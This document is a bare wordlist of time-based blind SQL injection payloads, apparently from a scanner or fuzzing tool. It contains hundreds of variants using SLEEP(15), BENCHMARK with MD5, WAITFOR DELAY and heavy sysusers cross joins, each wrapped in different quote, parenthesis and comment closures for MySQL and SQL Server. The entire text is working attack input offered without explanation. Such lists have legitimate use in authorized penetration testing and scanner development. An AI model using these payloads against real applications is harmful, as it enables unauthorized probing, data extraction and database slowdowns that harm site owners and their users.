) AND SLEEP(15)
') AND SLEEP(15)
' AND SLEEP(15)
" AND SLEEP(15)
) AND SLEEP(15) AND (4146=4146
)) AND SLEEP(15) AND ((5492=5492
))) AND SLEEP(15) AND (((6572=6572
 AND SLEEP(15)
') AND SLEEP(15) AND ('VXOW'='VXOW
')) AND SLEEP(15) AND (('oYbO'='oYbO
'))) AND SLEEP(15) AND ((('VYEz'='VYEz
' AND SLEEP(15) AND 'otRv'='otRv
') AND SLEEP(15) AND ('fgzO' LIKE 'fgzO
')) AND SLEEP(15) AND (('GUzJ' LIKE 'GUzJ
'))) AND SLEEP(15) AND ((('DENy' LIKE 'DENy
' AND SLEEP(15) AND 'Wxgo' LIKE 'Wxgo
") AND SLEEP(15) AND ("zMeD"="zMeD
")) AND SLEEP(15) AND (("ZjbJ"="ZjbJ
"))) AND SLEEP(15) AND ((("bGCA"="bGCA
" AND SLEEP(15) AND "POHc"="POHc
") AND SLEEP(15) AND ("zBQJ" LIKE "zBQJ
")) AND SLEEP(15) AND (("dXqr" LIKE "dXqr
"))) AND SLEEP(15) AND ((("uyBz" LIKE "uyBz
" AND SLEEP(15) AND "qOMT" LIKE "qOMT
%') AND SLEEP(15) AND ('%'='
%')) AND SLEEP(15) AND (('%'='
%'))) AND SLEEP(15) AND ((('%'='
%' AND SLEEP(15) AND '%'='
%00') AND SLEEP(15) AND ('SWFl'='SWFl
%00' AND SLEEP(15) AND 'YdLC'='YdLC
') WHERE 5406=5406 AND SLEEP(15) -- 
") WHERE 8450=8450 AND SLEEP(15) -- 
) WHERE 6101=6101 AND SLEEP(15) -- 
' WHERE 9542=9542 AND SLEEP(15) -- 
" WHERE 6991=6991 AND SLEEP(15) -- 
 WHERE 4681=4681 AND SLEEP(15) -- 
'||(SELECT 'HayY' FROM DUAL WHERE 5291=5291 AND SLEEP(15) )||'
'||(SELECT 'rhbZ' WHERE 3887=3887 AND SLEEP(15) )||'
'+(SELECT UtMo WHERE 9888=9888 AND SLEEP(15) )+'
'+(SELECT 'kigK' WHERE 4070=4070 AND SLEEP(15) )+'
' IN BOOLEAN MODE) AND SLEEP(15) #
) AND SLEEP(15)#
') AND SLEEP(15)#
' AND SLEEP(15)#
" AND SLEEP(15)#
)) AND SLEEP(15)#
))) AND SLEEP(15)#
 AND SLEEP(15)#
')) AND SLEEP(15)#
'))) AND SLEEP(15)#
") AND SLEEP(15)#
")) AND SLEEP(15)#
"))) AND SLEEP(15)#
%') AND SLEEP(15)#
%')) AND SLEEP(15)#
%'))) AND SLEEP(15)#
%' AND SLEEP(15)#
%00') AND SLEEP(15)#
%00' AND SLEEP(15)#
') WHERE 1619=1619 AND SLEEP(15)#
") WHERE 9712=9712 AND SLEEP(15)#
) WHERE 2378=2378 AND SLEEP(15)#
' WHERE 8518=8518 AND SLEEP(15)#
" WHERE 6805=6805 AND SLEEP(15)#
 WHERE 3768=3768 AND SLEEP(15)#
'||(SELECT 'zVKI' FROM DUAL WHERE 6783=6783 AND SLEEP(15)#
'||(SELECT 'IhFP' WHERE 8505=8505 AND SLEEP(15)#
'+(SELECT kdhu WHERE 4951=4951 AND SLEEP(15)#
'+(SELECT 'vfTV' WHERE 2377=2377 AND SLEEP(15)#
' IN BOOLEAN MODE) AND SLEEP(15)#
) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d))
') AND 9138=BENCHMARK(15000000,MD5(0x6d58666d))
' AND 9138=BENCHMARK(15000000,MD5(0x6d58666d))
" AND 9138=BENCHMARK(15000000,MD5(0x6d58666d))
) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (3217=3217
)) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((6481=6481
))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (((8293=8293
 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d))
') AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ('rSAu'='rSAu
')) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (('tyfV'='tyfV
'))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((('PEql'='PEql
' AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND 'mORG'='mORG
') AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ('ubQI' LIKE 'ubQI
')) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (('yVhO' LIKE 'yVhO
'))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((('MbCc' LIKE 'MbCc
' AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND 'kWWF' LIKE 'kWWF
") AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ("AqWW"="AqWW
")) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (("ugPy"="ugPy
"))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((("dLjR"="dLjR
" AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND "yFmD"="yFmD
") AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ("ldDw" LIKE "ldDw
")) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (("eFmU" LIKE "eFmU
"))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((("TolN" LIKE "TolN
" AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND "fAtP" LIKE "fAtP
%') AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ('%'='
%')) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND (('%'='
%'))) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ((('%'='
%' AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND '%'='
%00') AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND ('DteR'='DteR
%00' AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) AND 'Snse'='Snse
') WHERE 2332=2332 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
") WHERE 1789=1789 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
) WHERE 7066=7066 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
' WHERE 1101=1101 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
" WHERE 4100=4100 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
 WHERE 6949=6949 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) -- 
'||(SELECT 'rSjv' FROM DUAL WHERE 9654=9654 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) )||'
'||(SELECT 'ysnL' WHERE 8435=8435 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) )||'
'+(SELECT FNFo WHERE 8251=8251 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) )+'
'+(SELECT 'thVy' WHERE 5088=5088 AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) )+'
' IN BOOLEAN MODE) AND 9138=BENCHMARK(15000000,MD5(0x6d58666d)) #
) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
') AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
' AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
" AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
)) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
))) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
')) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
'))) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
") AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
")) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
"))) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%') AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%')) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%'))) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%' AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%00') AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
%00' AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
') WHERE 2716=2716 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
") WHERE 6341=6341 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
) WHERE 8882=8882 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
' WHERE 1208=1208 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
" WHERE 4636=4636 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
 WHERE 9097=9097 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
'||(SELECT 'eHKJ' FROM DUAL WHERE 6455=6455 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
'||(SELECT 'arxz' WHERE 4283=4283 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
'+(SELECT XfWx WHERE 5611=5611 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
'+(SELECT 'TJap' WHERE 4697=4697 AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
' IN BOOLEAN MODE) AND 6876=BENCHMARK(15000000,MD5(0x70764348))#
-2691
-3833) OR 1393=SLEEP(15)
-5403') OR 1393=SLEEP(15)
-1246' OR 1393=SLEEP(15)
-2023" OR 1393=SLEEP(15)
-3166) OR 1393=SLEEP(15) AND (8842=8842
-3283)) OR 1393=SLEEP(15) AND ((4592=4592
-2444))) OR 1393=SLEEP(15) AND (((8400=8400
-2614 OR 1393=SLEEP(15)
-5603') OR 1393=SLEEP(15) AND ('vMYJ'='vMYJ
-2779')) OR 1393=SLEEP(15) AND (('toiI'='toiI
-6853'))) OR 1393=SLEEP(15) AND ((('kjuy'='kjuy
-6312' OR 1393=SLEEP(15) AND 'pCIY'='pCIY
-6864') OR 1393=SLEEP(15) AND ('WDHS' LIKE 'WDHS
-2758')) OR 1393=SLEEP(15) AND (('UyIh' LIKE 'UyIh
-6460'))) OR 1393=SLEEP(15) AND ((('kWaF' LIKE 'kWaF
-4977' OR 1393=SLEEP(15) AND 'HsGI' LIKE 'HsGI
-2166") OR 1393=SLEEP(15) AND ("Izhv"="Izhv
-1926")) OR 1393=SLEEP(15) AND (("lmBY"="lmBY
-9458"))) OR 1393=SLEEP(15) AND ((("TAdV"="TAdV
-1589" OR 1393=SLEEP(15) AND "ilFa"="ilFa
-4288") OR 1393=SLEEP(15) AND ("YAKk" LIKE "YAKk
-1215")) OR 1393=SLEEP(15) AND (("niyJ" LIKE "niyJ
-8618"))) OR 1393=SLEEP(15) AND ((("IEnG" LIKE "IEnG
-4585" OR 1393=SLEEP(15) AND "PQNn" LIKE "PQNn
-2928%') OR 1393=SLEEP(15) AND ('%'='
-9649%')) OR 1393=SLEEP(15) AND (('%'='
-2595%'))) OR 1393=SLEEP(15) AND ((('%'='
-7956%' OR 1393=SLEEP(15) AND '%'='
-3365%00') OR 1393=SLEEP(15) AND ('lYVT'='lYVT
-1540%00' OR 1393=SLEEP(15) AND 'grda'='grda
-7448') WHERE 9840=9840 OR 1393=SLEEP(15) -- 
-7965") WHERE 8520=8520 OR 1393=SLEEP(15) -- 
-7178) WHERE 1036=1036 OR 1393=SLEEP(15) -- 
-8530' WHERE 8906=8906 OR 1393=SLEEP(15) -- 
-9483" WHERE 5709=5709 OR 1393=SLEEP(15) -- 
-8578 WHERE 7041=7041 OR 1393=SLEEP(15) -- 
-4385) OR 5837=BENCHMARK(15000000,MD5(0x694c5857))
-9206') OR 5837=BENCHMARK(15000000,MD5(0x694c5857))
-7295' OR 5837=BENCHMARK(15000000,MD5(0x694c5857))
-5874" OR 5837=BENCHMARK(15000000,MD5(0x694c5857))
-5238) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (8129=8129
-2982)) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((8371=8371
-2536))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (((6068=6068
-1050 OR 5837=BENCHMARK(15000000,MD5(0x694c5857))
-9620') OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ('oszx'='oszx
-4240')) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (('lYiD'='lYiD
-4028'))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((('ebbk'='ebbk
-3722' OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND 'vSMW'='vSMW
-8587') OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ('kpVh' LIKE 'kpVh
-3810')) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (('GLyF' LIKE 'GLyF
-4832'))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((('EFLr' LIKE 'EFLr
-4454' OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND 'QilT' LIKE 'QilT
-4640") OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ("QLNr"="QLNr
-3881")) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (("QTCM"="QTCM
-5369"))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((("KVME"="KVME
-8037" OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND "clay"="clay
-8378") OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ("oTjE" LIKE "oTjE
-2289")) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (("Dqqz" LIKE "Dqqz
-3443"))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((("aiun" LIKE "aiun
-2252" OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND "ZtwD" LIKE "ZtwD
-3314%') OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ('%'='
-1520%')) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND (('%'='
-8627%'))) OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ((('%'='
-9562%' OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND '%'='
-4658%00') OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND ('olXY'='olXY
-9436%00' OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) AND 'bEdO'='bEdO
-2583') WHERE 8873=8873 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
-3959") WHERE 2120=2120 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
-7882) WHERE 3184=3184 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
-3094' WHERE 4319=4319 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
-1486" WHERE 3766=3766 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
-6240 WHERE 4803=4803 OR 5837=BENCHMARK(15000000,MD5(0x694c5857)) -- 
(SELECT (CASE WHEN (6582=6582) THEN SLEEP(15) ELSE 6582*(SELECT 6582 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT (CASE WHEN (4478=4478) THEN (SELECT BENCHMARK(15000000,MD5(0x78455241))) ELSE 4478*(SELECT 4478 FROM mysql.db) END))
(5452=5452)*SLEEP(15)
MAKE_SET(2657=2657,SLEEP(15))
ELT(6419=6419,SLEEP(15))
,(SELECT (CASE WHEN (4944=4944) THEN SLEEP(15) ELSE 4944*(SELECT 4944 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
,(SELECT (CASE WHEN (2825=2825) THEN (SELECT BENCHMARK(15000000,MD5(0x67587975))) ELSE 2825*(SELECT 2825 FROM mysql.db) END))
) WAITFOR DELAY '0:0:15'--
') WAITFOR DELAY '0:0:15'--
' WAITFOR DELAY '0:0:15'--
" WAITFOR DELAY '0:0:15'--
)) WAITFOR DELAY '0:0:15'--
))) WAITFOR DELAY '0:0:15'--
 WAITFOR DELAY '0:0:15'--
')) WAITFOR DELAY '0:0:15'--
'))) WAITFOR DELAY '0:0:15'--
") WAITFOR DELAY '0:0:15'--
")) WAITFOR DELAY '0:0:15'--
"))) WAITFOR DELAY '0:0:15'--
%') WAITFOR DELAY '0:0:15'--
%')) WAITFOR DELAY '0:0:15'--
%'))) WAITFOR DELAY '0:0:15'--
%' WAITFOR DELAY '0:0:15'--
%00') WAITFOR DELAY '0:0:15'--
%00' WAITFOR DELAY '0:0:15'--
') WHERE 9776=9776 WAITFOR DELAY '0:0:15'--
") WHERE 7135=7135 WAITFOR DELAY '0:0:15'--
) WHERE 2743=2743 WAITFOR DELAY '0:0:15'--
' WHERE 5354=5354 WAITFOR DELAY '0:0:15'--
" WHERE 4330=4330 WAITFOR DELAY '0:0:15'--
 WHERE 3644=3644 WAITFOR DELAY '0:0:15'--
'||(SELECT 'vRpL' FROM DUAL WHERE 4208=4208 WAITFOR DELAY '0:0:15'--
'||(SELECT 'EzMa' WHERE 7118=7118 WAITFOR DELAY '0:0:15'--
'+(SELECT slXq WHERE 8308=8308 WAITFOR DELAY '0:0:15'--
'+(SELECT 'ghge' WHERE 2037=2037 WAITFOR DELAY '0:0:15'--
' IN BOOLEAN MODE) WAITFOR DELAY '0:0:15'--
) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
') AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
' AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
" AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (9633=9633
)) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((6377=6377
))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (((7509=7509
 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
') AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('yUAk'='yUAk
')) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('iSXe'='iSXe
'))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('gucX'='gucX
' AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'kUsx'='kUsx
') AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('logA' LIKE 'logA
')) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('jnSt' LIKE 'jnSt
'))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('GWMk' LIKE 'GWMk
' AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'weqq' LIKE 'weqq
") AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ("TxbI"="TxbI
")) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (("KwAe"="KwAe
"))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((("zRMH"="zRMH
" AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND "ruwO"="ruwO
") AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ("LpaD" LIKE "LpaD
")) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (("BmiJ" LIKE "BmiJ
"))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((("IaJz" LIKE "IaJz
" AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND "Gpwj" LIKE "Gpwj
%') AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('%'='
%')) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('%'='
%'))) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('%'='
%' AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
%00') AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('zwkc'='zwkc
%00' AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'cMwG'='cMwG
') WHERE 2164=2164 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
") WHERE 8325=8325 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
) WHERE 3075=3075 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
' WHERE 4501=4501 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
" WHERE 3471=3471 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
 WHERE 2450=2450 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
'||(SELECT 'jsWW' FROM DUAL WHERE 3287=3287 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) )||'
'||(SELECT 'Fegh' WHERE 9826=9826 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) )||'
'+(SELECT cSQr WHERE 3787=3787 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) )+'
'+(SELECT 'FxfC' WHERE 2803=2803 AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) )+'
' IN BOOLEAN MODE) AND 9180=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) #
) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
') AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
' AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
" AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
)) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
))) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
')) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
'))) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
") AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
")) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
"))) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%') AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%')) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%'))) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%' AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%00') AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
%00' AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
') WHERE 6287=6287 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
") WHERE 9587=9587 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
